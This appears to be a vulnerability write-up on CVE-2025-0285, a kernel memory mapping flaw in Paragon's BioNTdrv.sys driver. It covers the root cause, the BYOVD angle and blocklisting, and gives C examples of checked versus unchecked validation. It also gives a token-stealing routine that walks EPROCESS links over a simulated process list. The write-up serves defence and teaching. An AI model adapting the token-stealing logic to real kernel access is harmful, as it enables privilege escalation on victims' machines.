CVE-2025-0285
BioNTdrv.sys -- arbitrary kernel memory mapping allows elevation of privilege
Summary
| Field | Value |
|---|---|
| Driver | BioNTdrv.sys (Paragon Partition Manager) |
| Vulnerability Class | Arbitrary Memory Mapping |
| Exploited ITW | No |
| Vendor | Paragon Software |
Root Cause
Paragon Partition Manager ships a kernel driver, BioNTdrv.sys, that provides the low-level disk access its partition operations need. That work legitimately requires kernel-mode access to disk structures, but the driver's IOCTL interface exposes far more than partition management requires.
One of the exposed IOCTLs maps kernel virtual memory into the calling process's user-mode address space. The driver takes a kernel virtual address and a length from the user-mode request, builds the mapping, and returns it without validating either value. It does not check who the caller is, does not restrict the target address to memory the driver itself owns, and does not sanity-check the length, so a caller can ask for any range of the kernel address space and receive a user-mode view of it.
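The shape of the problem, as an added example that is not Paragon's code: a hypothetical handler for a "map this kernel range for me" request, written as portable C so it runs anywhere. map_request_unchecked() is the pattern described above (whatever the caller sends is accepted); map_request_checked() adds the checks such a handler needs, including the overflow-safe end computation that a length check is most often missing. The names map_request_t, region_t and map_verdict, and the caller_is_privileged flag standing in for a device DACL or requestor-mode check, are all assumptions of this example.

```c
/*
 * Added example, not Paragon's code: vulnerable vs. hardened validation
 * for a "map kernel range" IOCTL. All type and function names are
 * hypothetical; the logic is portable C so it can be compiled and run
 * outside a kernel.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uintptr_t base;   /* kernel virtual address supplied by user mode */
    size_t    length; /* byte count supplied by user mode */
} map_request_t;

/* The one buffer the driver legitimately owns and may expose. The driver
 * constructs this itself, so base + length is assumed not to wrap. */
typedef struct {
    uintptr_t base;
    size_t    length;
} region_t;

typedef enum {
    MAP_OK = 0,
    MAP_EPERM,      /* caller may not use this IOCTL at all */
    MAP_EZERO,      /* zero-length request */
    MAP_EOVERFLOW,  /* base + length wraps around the address space */
    MAP_ERANGE      /* request reaches outside the driver-owned region */
} map_verdict;

/* Vulnerable shape: the caller's base and length are used as-is, so any
 * kernel range, including one that is not the driver's, gets mapped. */
map_verdict map_request_unchecked(const map_request_t *req)
{
    (void)req;
    return MAP_OK;
}

/* Hardened shape. caller_is_privileged stands in for whatever the real
 * driver would do to restrict access (a restrictive DACL on the device
 * object, or rejecting user-mode requestors outright). */
map_verdict map_request_checked(const map_request_t *req,
                                const region_t *allowed,
                                bool caller_is_privileged)
{
    if (!caller_is_privileged)
        return MAP_EPERM;
    if (req->length == 0)
        return MAP_EZERO;
    /* Compute the exclusive end without letting base + length wrap: a
     * wrapped end would sail through a naive "end <= region_end" test. */
    if (req->length > UINTPTR_MAX - req->base)
        return MAP_EOVERFLOW;
    uintptr_t end         = req->base + req->length;
    uintptr_t allowed_end = allowed->base + allowed->length;
    if (req->base < allowed->base || end > allowed_end)
        return MAP_ERANGE;
    return MAP_OK;
}
```

The two range tests together (start not below the region, exclusive end not above it) are what keep a request that straddles the end of the region out, and the overflow test has to come before them or a request such as base = UINTPTR_MAX - 16, length = 256 produces a small end and passes.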
This is one of five vulnerabilities in BioNTdrv.sys reported at the same time, alongside CVE-2025-0286, CVE-2025-0287, CVE-2025-0288 and CVE-2025-0289. Five separate kernel primitives reachable through the same IOCTL interface, none of them access-controlled, suggest the driver was written with kernel security boundaries as an afterthought.
CERT/CC coordinated the disclosure under VU#726882, and Microsoft added the vulnerable BioNTdrv.sys builds to its recommended driver block rules (the Vulnerable Driver Blocklist), so that the signed but vulnerable binary is refused on systems that enforce the list.
Exploitation
The attacker needs a handle to the driver's device object. On a machine where Paragon Partition Manager is already installed the driver is present and, because it performs no caller-privilege check, an unprivileged local user can open it directly, which makes the bug a local elevation of privilege. Otherwise the attacker brings the signed driver along (BYOVD): loading it requires administrator rights, but the valid signature means Driver Signature Enforcement accepts it unless the blocklist is enforced, so the driver turns an administrator foothold into kernel access. Either way, the memory mapping IOCTL then provides direct read/write access to any kernel virtual address.
With kernel memory mapped into user space, the attacker locates the EPROCESS list, walks ActiveProcessLinks to the System process (PID 4), reads its Token field, and writes that value over the Token of the attacker's own process. The chain is deterministic: no race conditions, no heap grooming, and no separate information leak, because the same mapping primitive that performs the write also reads whatever the exploit needs in order to find its targets. One IOCTL supplies everything needed for privilege escalation.
Exploitation Primitive
Open device handle -> memory mapping IOCTL
-> arbitrary kernel memory R/W -> SYSTEM
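The token-theft walk described above, as an added example that is neither Paragon's code nor a working exploit: it runs the same EPROCESS list walk and Token copy over a constructed stand-in for the mapped kernel memory, so it executes offline. kread64() and kwrite64() model the read/write primitive the mapping IOCTL hands a user-mode caller; fake_kernel holds four hand-built process blocks linked the way the kernel links them. The _EPROCESS field offsets, EP_SIZE and FAKE_KBASE are assumptions of this example; on a real target the offsets come from the symbols for the exact kernel build.

```c
/*
 * Added example, not Paragon's code and not a real exploit: token stealing
 * over an arbitrary kernel R/W primitive, run against a constructed fake
 * process list. All offsets and the FAKE_KBASE address are hypothetical.
 */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OFF_PID    0x440u   /* hypothetical _EPROCESS.UniqueProcessId */
#define OFF_LINKS  0x448u   /* hypothetical _EPROCESS.ActiveProcessLinks */
#define OFF_TOKEN  0x4b8u   /* hypothetical _EPROCESS.Token (_EX_FAST_REF) */
#define EP_SIZE    0x500u   /* spacing between the fake process blocks */
#define NPROC      4
#define SYSTEM_PID 4u
#define FAKE_KBASE ((uintptr_t)0x10000)  /* "kernel VA" of the first block */

static uint8_t fake_kernel[NPROC * EP_SIZE];

/* The primitive the mapping IOCTL gives out: kernel VA -> bytes in the view.
 * Out-of-range addresses read as 0 / are ignored so a bad walk cannot crash. */
uint64_t kread64(uintptr_t kva)
{
    uint64_t v = 0;
    if (kva < FAKE_KBASE || kva - FAKE_KBASE + sizeof v > sizeof fake_kernel)
        return 0;
    memcpy(&v, &fake_kernel[kva - FAKE_KBASE], sizeof v);
    return v;
}

void kwrite64(uintptr_t kva, uint64_t v)
{
    if (kva < FAKE_KBASE || kva - FAKE_KBASE + sizeof v > sizeof fake_kernel)
        return;
    memcpy(&fake_kernel[kva - FAKE_KBASE], &v, sizeof v);
}

/* Constructed sample: System (PID 4), two bystanders and "us" (PID 1234),
 * linked into the circular ActiveProcessLinks list the kernel maintains. */
static const uint64_t fake_pids[NPROC]   = { SYSTEM_PID, 640, 1234, 2000 };
static const uint64_t fake_tokens[NPROC] = {
    0xffff9c0012340007ull, 0xffff9c0056780003ull,
    0xffff9c009abc0005ull, 0xffff9c00def00002ull };

void build_fake_process_list(void)
{
    memset(fake_kernel, 0, sizeof fake_kernel);
    for (int i = 0; i < NPROC; i++) {
        uintptr_t ep   = FAKE_KBASE + (uintptr_t)i * EP_SIZE;
        uintptr_t next = FAKE_KBASE + (uintptr_t)((i + 1) % NPROC) * EP_SIZE;
        uintptr_t prev = FAKE_KBASE + (uintptr_t)((i + NPROC - 1) % NPROC) * EP_SIZE;
        kwrite64(ep + OFF_PID, fake_pids[i]);
        kwrite64(ep + OFF_LINKS,     next + OFF_LINKS);  /* LIST_ENTRY.Flink */
        kwrite64(ep + OFF_LINKS + 8, prev + OFF_LINKS);  /* LIST_ENTRY.Blink */
        kwrite64(ep + OFF_TOKEN, fake_tokens[i]);
    }
}

/* Walk ActiveProcessLinks from any known EPROCESS until the PID matches.
 * Flink points at the next block's LIST_ENTRY, so subtract OFF_LINKS to get
 * back to the start of that _EPROCESS (what CONTAINING_RECORD does). Stops
 * after a full circle, on a null link, or at a hard cap for a corrupt list. */
uintptr_t find_eprocess_by_pid(uintptr_t start_ep, uint64_t pid)
{
    uintptr_t ep = start_ep;
    for (int guard = 0; guard < 4096; guard++) {
        if (kread64(ep + OFF_PID) == pid)
            return ep;
        uintptr_t flink = kread64(ep + OFF_LINKS);
        if (flink == 0)
            return 0;
        ep = flink - OFF_LINKS;
        if (ep == start_ep)
            break;  /* full circle: PID not present */
    }
    return 0;
}

/* The escalation step: copy System's Token value over our own. Copying the
 * whole _EX_FAST_REF, low reference-count bits included, is the classic
 * token-stealing payload. Returns 0 on success, -1 if a PID was not found. */
int steal_system_token(uintptr_t start_ep, uint64_t my_pid)
{
    uintptr_t sys = find_eprocess_by_pid(start_ep, SYSTEM_PID);
    uintptr_t me  = find_eprocess_by_pid(start_ep, my_pid);
    if (sys == 0 || me == 0)
        return -1;
    kwrite64(me + OFF_TOKEN, kread64(sys + OFF_TOKEN));
    return 0;
}
```

Call build_fake_process_list() first, then steal_system_token(FAKE_KBASE, 1234); afterwards kread64() on the PID 1234 block's Token offset returns System's token value while the other blocks are untouched. On a real target the starting EPROCESS would come from a known kernel symbol or from scanning the mapped view, and the walk is the same.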
Broader Significance
The five-vulnerability cluster in BioNTdrv.sys is a case study in how third-party disk management software creates kernel attack surface. Partition managers need kernel-level access for legitimate operations, but the boundary between "the kernel access disk operations need" and "arbitrary kernel memory manipulation" has to be drawn deliberately, and Paragon's driver drew none, exposing the full kernel address space to any caller. The CERT/CC coordination and the Microsoft blocklist addition show the multi-party response needed when a widely installed, validly signed third-party driver turns out to be a BYOVD goldmine: a fix from the vendor does nothing about the old signed binary, which keeps loading on any machine that does not enforce the blocklist.